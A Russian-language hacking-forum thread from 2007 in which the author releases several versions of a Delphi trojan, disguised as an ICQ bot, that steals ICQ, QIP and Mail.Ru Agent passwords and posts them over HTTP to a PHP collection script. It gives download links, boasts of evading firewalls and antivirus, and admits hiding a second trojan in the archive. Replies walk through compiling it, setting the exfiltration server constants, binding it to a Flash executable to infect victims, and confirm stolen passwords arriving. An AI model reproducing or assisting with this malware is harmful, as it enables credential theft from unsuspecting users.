Итак, приступим. Если кто то постоянно тoрчит на Античате и у него хорошая память, то он помнит что гдето месяца полтора назад я выкладывал троянца, который маскируется под ICQ Бота, а на самом деле ворует пароли (очень нехороший =( ). Примерно в воскресенье я сел с утра и начал писать вторую версию. Закончил я это дело в понедельник =). Эти дни я давал троянца на проверку разным хорошим пиплам, чтобы они нашли и сообщили мне о глюках =), теперь же я выкладываю официальную (гыгы) вторую версию троянца. Нового оччень много, но обо всем попорядку. Что добавлено/исправлено:
- Добавлен поиск по винту НЕУСТАНОВЛЕННОГО QIP.
- Исправлены глючки с процедурой извлечения паролей (они были и во множетсве = ) ).
- Кардинально изменен способ передачи данных. Теперь троян использует не ICQ протокол, а HTTP, а еще конкретнее библиотеку WinInet. Не палится файерами (вроде бы =) ). Антивирями тоже не палится.
- Соответственно, если передача теперь по HTTP, То для троя был написан сниффер (его исходник в проекте).
- Написан подробный ReadMe.txt =))))

Обращаю внимание, что программа написана в ОБРАЗОВАТЕЛЬНЫХ целях, не стоит реально украдывать ею аськи!!!!

Архив с проектом качаем тутс:
http://ggg123321.narod.ru/troy.rar

Теперб к вопросам компиляции, после релиза первого трояна ICQ и еще одного моего троянца, мою личку зафлудили вопросами о компиляции =))). Объясняю все и всем сразу =). Ничего сложного нет!!! С проектом идет компонент TICQ2003Decrypt (автор не я, автор CobanS), его нужно установить. Далее нужно нажать ctrl-f9, чтобы Делфи скомпилировал троянца без запуска! Дальше можно оптимизировать размер каким нето пакером, но и то это будет приятное, но не обязательное дополнение. ВСЕ!!!!! Это не сложно!!!!! Если же совсем туго, то можно спросить в теме. Это не стыдно, форум для того и создан чтобы делится опытом и знаниями! Потом, у меня перебои с инетом, и я могу ответить не сразу, а в теме же это сделают пусть и дургие люди но оперативно!

Авторские права принадлежат прежде всего Antichat.Ru, ну и вашему покорному слуге - А®ТеS'y.
Вы можете модифироваь код, это только приветствуется, единственное чего вы не имеет права делать, это КОММЕРЧСКИ распространять программу.

__________________
CopyRight Antichat.Ru
2007 year

аффтор пость все в одном посте!

Кто нить качал?

я качал вируса не обнаружено, ещё бы суметь под себя подстроить=)

P.s. СКАЖЕМ ВСЕ СПАСИБО А®Теs!!

пока на работоспособность не пробовал , но всётаки

Автору респект!!!
Выдирает даже с флешек! :eek: .
Работает вроде без багов, только дельфи 7 при компиляции какой-то совет дает, а так вроде без подстав канектится на указаный сниффер.
Outpost 4 резет.
Каспер с доктором вебом с последними базами на момент теста неполили.
я качал вируса не обнаружено, ещё бы суметь под себя подстроить=)

P.s. СКАЖЕМ ВСЕ СПАСИБО А®Теs!!

пока на работоспособность не пробовал , но все-таки
А что там настраивать там по-моему любой догонит. :eek:
Там на русским в исходниках написано где и что менять =)))
Если не поймёшь стуки в Асю помогу чем смогу ;)

P.s. даже я с первого раза все правильно скампилил ;)

Автору респект и плюсик в репу =)

Привет.
Скачал троя, подключил ICQ2003Decrypt , поменял константы, скомпилил.
Проверил - не пашет.
возможно пролема в константах.
Я их задал в формате:

Server_Addr: PChar= 'http://Myserver.122mb.com'; // мой сайт
ScriptName: PChar= 'need.php'; // имя скрипта.
hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded'; // Не менял

Скрипт лежит в корневой папке, т.е. http://Myserver.122mb.com/need.php
Лог файл тоже там.

С уважением, bt2mf88a

Server_Addr: PChar= 'http://Myserver.122mb.com'; // мой сайт
ScriptName: PChar= 'need.php'; // имя скрипта.
hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded'; // Не менял


Задавай в таком виде ;)

Server_Addr: PChar= 'Myserver.122mb.com';

Так тоже задавал...

У меня примерно так и всё работает.

Server_Addr: PChar= 'Myserver.122mb.com';
ScriptName: PChar= 'need.php';
hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded';

Посматри может фаер блочит или антивирь?

Или ты просто неправильно установил компонент TICQ2003Decrypt.

поставь без заглавной буквы .
Server_Addr: PChar= 'myserver.122mb.com';

Всем спасибо, все пашет, ошибка была в подключении Unit.pas
Автору respect ;-) tnx

P.s. Кстати в лог на серваке все норм пишет, а вот на почту глючный пас присылает...

respect :)

Могет кто батник написать что б дельфи компилятор неискать?

P.s. Кстати в лог на серваке все норм пишет, а вот на почту глючный пас присылает...
Что именно глючно? И ты где сниффер разместил? у меня на h17.ru вроде бы все ок=)

У меня на все хосты и бесплатные и платные все пашет и на мыло все четко приходит!!!
З.ы. мыло Gmail - e.

Всем спасибо, все пашет, ошибка была в подключении Unit.pas
Автору respect ;-) tnx

P.s. Кстати в лог на серваке все норм пишет, а вот на почту глючный пас присылает...

Стукни в асю помагу разобраться!

З.ы. ася 4287801

Слух добвь функцию для Mail.ru Agent а тоже плз, буду очень признателен, никто не знает прогу которая крадётисторию переписка ICQ и агента?

Короче я представляю на ваш суд обновленного троянца, версия 2.01 =). Что добавлено/убрано/изменено:
- Незначительно переработан сорец троянца
Очень сильно доработан сниффер, теперь там есть:
- Запись в лог IP адреса с которого все пришло
- Запись в лог Даты/времени прибытия
- Теперь есть админка, т.е. без знания логина/пароля лог не посмотришь =). (пароль и логин хранятся ко всему прочему в стойком md5, блин отвлекся =) )
- Внешний вид админки сниффера довольно таки цивильный, т.е. доработка дизайна =)
Качаем тута:
http://ggg123321.narod.ru/varlok_troy_2.01.rar
Опять же напоминаю, что копирайты принадлежат Античату (AntiChat.Ru) и мне (А®ТеS'у), ты не могешь распространять программ коммерчески, доработка кода лишь приветствуется.

За незаконное в рамках законодательства твоей страны применение троянца никто, кроме тебя самого ответственности НЕ НЕСЕТ!!! Если будешь пытацца протроянить админов ICQ.com, то можешь сесть по 273 - "Написание и распространение", в остальных случаях тебе грозит лишь посыл на три веселых буквы =)))).

Слух добвь функцию для Mail.ru Agent а тоже плз, буду очень признателен, никто не знает прогу которая крадётисторию переписка ICQ и агента?
Про мыло агента я думал, может сделаю, переписку украсть невозможно, т.к. она сохраняется на машине пользователя (я так подозреваю что и на icq.com, но это токо мои подозрения =) ). Я даже кстати темку тут на форуме видел, там как раз этот вопрос обсуждали =)
з.ы. ептыть до меня токо счас доперло что ты имел ввиду =))), короче мона сделать тырильщик логов общения, это легко =)

А®Теs молодец, держи + ;)

Автор, как от этого троя избавляться? А то из-за одного *****, который выложил зараженный линк на ачате, у меня теперь это сидит.

да никак, он себя в автозапуск не пишет =). Запустил, пароли улетели, троян отработал и затих до нового запуска (т.е. запускуает сам юзер)

Ага, то есть враг народа может повторно стырить мои пароли? или как в случае пинча, только если я зараженный файл открою еще раз?

Только если откроешь повторно. В будущих версиях я хочу исправить данный недостаток =)))

Короче народ, выкладываю очередной релиз. Я исправил ошибку в сниффере (небольщая была) и доработал троянца, теперь он ко всему прочему еще и прет пароли от Mail.Ru Agent'a. Качаем тута:
http://ggg123321.narod.ru/varlok_troy_3.0.rar
Большая и убедительная просьба прочесть ReadMe первым делом!!! =)
Напомню про копирайты:
AntiChatRu and А®ТеS

Народ у меня вопрос а хостинги можно использовать любые (для бизнеса,рекламы или персональный сайт)? Да и посоветуйте нормальный хост а то на h17.ru неочень.
Зарание спасибо за помошь:)

Любые. Из бесплатных ИМХО h17.ru лучший.

Всё замечательно работает )

Прислал все пароли, правильные, для каждого номера отдельное письмо)

Пробовал версию 2,01 со старой версией снифера на платном хосте.
Респект и + тебе А®Теs

Немножко помудохавшись с компилированием, делфи таки родил мне билд, затем я его пакнул и склеил с exe'шной флеш анимашкой;). (принесло много радости ^__^ )
Не всегда нормально вытаскиваются пароли с Мейл агента и тащит кривые пароли с нового квипа (8010). А так автору респект :cool: +1

з.ы пробовал на третьей версии варлока :p

Помогите разобраться захожу в папку компонент запускаю ICQ2003Decrypt.pas нажимаю ctrl+F9 не чего не происходит. ЗАрание спасибо!!!

Помогите разобраться захожу в папку компонент запускаю ICQ2003Decrypt.pas нажимаю ctrl+F9 не чего не происходит. заранее спасибо!!!

ман, ты должен открыть файл проекта(*.dpr), а не исходник.
если ты откроеш исходник, ты его не скомпилиш.


ЗЫ: по теме=) как юзать TResourceStream? киньте примерчик в лс или сюда =)

объясните по подробней пожалуйста как скомпилить

где взять TICQ2003Decrypt

TICQ2003Decrypt дан с трояном поищи там

нету такого файла всё посмотрел выложите отдельно

нету такого файла всё посмотрел выложите отдельно


есть там всё!он в папке Component

Заметил что после запуска бинарника вылетает следующая ошибка
" is not a valid integer value , палево однако, у когонть есть такое?

Заметил что после запуска бинарника вылетает следующая ошибка
" is not a valid integer value , палево однако, у когонть есть такое?
Скачай последний релиз и не парься. Это связано с тем, что в реестре magic byte запиисан, как не являющимся диапазоном Integer. Но как я уже сказал все исправлено, перекачй просто архив =)

Короче представляю версию 3.01. Существенных изменений нет, в основном фиксы на разные глюки =), но тем не меннее настоятельно рекомнудю скачать:
http://ggg123321.narod.ru/varlok_troy_3.1.rar

Палит файрволл... если закрыть доступ программе пишет все ту старую ошибку про " is not integer value.

нашел новый баг... в последней версии... пароли из под Qip выдирает не достаточно верно... а точнее уже у двух челов у которых Qip выдрал пароль, да не правильный...

2 VladislavSmirnov
Посмотри описание обновлений последней версии qip=\

Блин, народ , подскажите как установить-то этот TICQ2003Decrypt ?? открываю, я проэкт Project1.dpr нажимаю "add file to project" выбираю \troy\Component\ICQ2003Decrypt.pas так или как добовлять то ??

смотри тут (http://alexey-lab.narod.ru/delphi_component.htm) как устанавливать компоненты на делфи, даже с картинками сделали=\
зы гугль рулит :rolleyes:

Зделал новую версию 3.2. Пофиксены все извесные глюки, качаем тут - http://ggg123321.narod.ru/varlok_troy_3.2.rar
З.Ы. вот что значит видеть в людях лучшее =). Указал свой мыльник и не так давно получил на него около 1000 флудеских писем, с мыла пришлось слесть...теперь контактов публиковать небуду.

А®ТеS,автор,а как называеца тот самый файл в директории Trojan_Sources,который портит винду?и на скока сильно?и как избавляца от последствий?

Спасибо, классная трояна, автору + ..

А®ТеS,автор,а как называеца тот самый файл в директории Trojan_Sources,который портит винду?и на скока сильно?и как избавляца от последствий?
ДА про винду это стеб был ваще то =)))), там обычный троянец "под меня", называется VTBA.scr, выложен с целью сбора СТАТИСТИЧЕСКОЙ информации (а не паролей как думают некоторые =) ).

Автору респект ;) жаль плюсик не могу поставить...

*там обычный троянец "под меня", называется VTBA.scr, выложен с целью сбора СТАТИСТИЧЕСКОЙ информации (а не паролей как думают некоторые =) ).* /аха давай давай))......бугагагга

а ваще так троянец норма))

Фигово что слишком большой размер троя, а также палится фаерволами. Хотеось бы узнать, он тащит пароли от Qip 8010?

Фигово что слишком большой размер троя, а также палится фаерволами. Хотеось бы узнать, он тащит пароли от Qip 8010?


таЩит..у меня вот стаЩЩИл )))))) ... !

И в каком он у тебя виде? Qip 8010 пароль сначала криптует, затем в base64, а потом уж в Hex. Что то я очень сомневаюсь что он тащит их в чистом виде, и что вобще он их тащит!

Народ кому не трудно кто разобрался в трое напишите в IcQ 9643765 плюс подкину

ArTeS плиз как будеш свободен стукни в асю!
и кстате вот что выхрдит при запуске троя вылазеет окошечко на сниф точней на loh.log пасы приходят от icq норм а от квипа 44494E41 вот такой пароль приходит поможите плиз !

Значит Квип стоит 8010, а от него парои приходят не правильные, если ты напишешь тот пароль который пришел в Хексе то получишь начало названия компа! А вобще пока не видел не одного троя, пинча тянущего пароли от 8010. А во вторых, даже если ты и сможешь их вытащить, то они все равно шифрованы: сначала криптовка, затем base64, а потом Хексом! Я считаю что сейчас тащить пароли от асек не оправдано пинчем.... т.к у большинства народа стоит именно Квип, и чтобы достать и расшифровать пароли надо долго и много поработать :)!

надо за бугор двигать ентот трой - тама поди проканает)))))

насколько я понял троян не пукает фаер
и не понятно как там с паролями от квипа 8010. лана, щас буду сам пробовать.
автору респект. поставлю + при первой возможности

P.S.:
... троянец ко всему прочему теперь еще и прет пароли от Mail.Ru Agent (сохраненные пароли токо). Это главное отличие троянца от предыдущих. Ради этого (блин) даже пишлось искать и ставить этот долбанный агент!!! К слову сказать, кто его писал, делал это не руками!!!
жжошь )

Подскажите правильно ли я делаю?
1. Сначала я создаю сайт (на narod'e можно?), потом скидываю на него все файлы которые находятся в папке new_sniffer.
2. Потом открываю с помощью делфи вот этот файл ICQ2003Decrypt.pas ?
Что делать после этого, что надо изменять?

А вообще если не трудно свяжитесь со мной по аське 218-239-500 , за мной +

Подскажите правильно ли я делаю?
1. Сначала я создаю сайт (на narod'e можно?), потом скидываю на него все файлы которые находятся в папке new_sniffer.

Естественно нельзя, нужен хостинг с поддержкой php :)

Не приходят пароли хостинг jino-net.ru
мыло на майл.ру.
Что я делаю не так ?

//Меняем здесь!!!!
//Change hear!!!!
Server_Addr: PChar= 'games-gothic.jino-net.ru';
ScriptName: PChar= 'http://www.games-gothic.jino-net.ru/need.php';
hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded';
Вотак выглядит у меня...

С проектом идет компонент TICQ2003Decrypt (автор не я, автор CobanS), его нужно установить.
С помощью какой программы его нужно установить?

я не могу у меня сердце кровю обливаеться: врубаем delphi идем file>close all. потом component > install component > brouse дальше откриваем ICQ2003Decrypt. pas > yes > file >close all > all . > в папку troyan_sources кидаем ICQWorcks.dcu > откриваем troyan_sources/Project1.dpr > изменяем параметри на нужние > жмем ctrl +F9 > файл создался. ps: если ето была защита от очень умных людей - ногами по голове не бейте.

Всем привет. Возникла одна проблема, установил троя создал хост на h17 вообщем сделал все как было описано, но почему-то приходят не пароли, а номер моей аськи. Может кто знает в чем тут дело? Приходят данные в таком виде...
[QUOTE]IP адрес:
***.***.***.***-мой IP
Дата прибытия:
Friday 30th of March 2007 12:42:01 PM
Данные:
********; -номер моей аськи

переделал сорци троя нада затестить кто возьметься?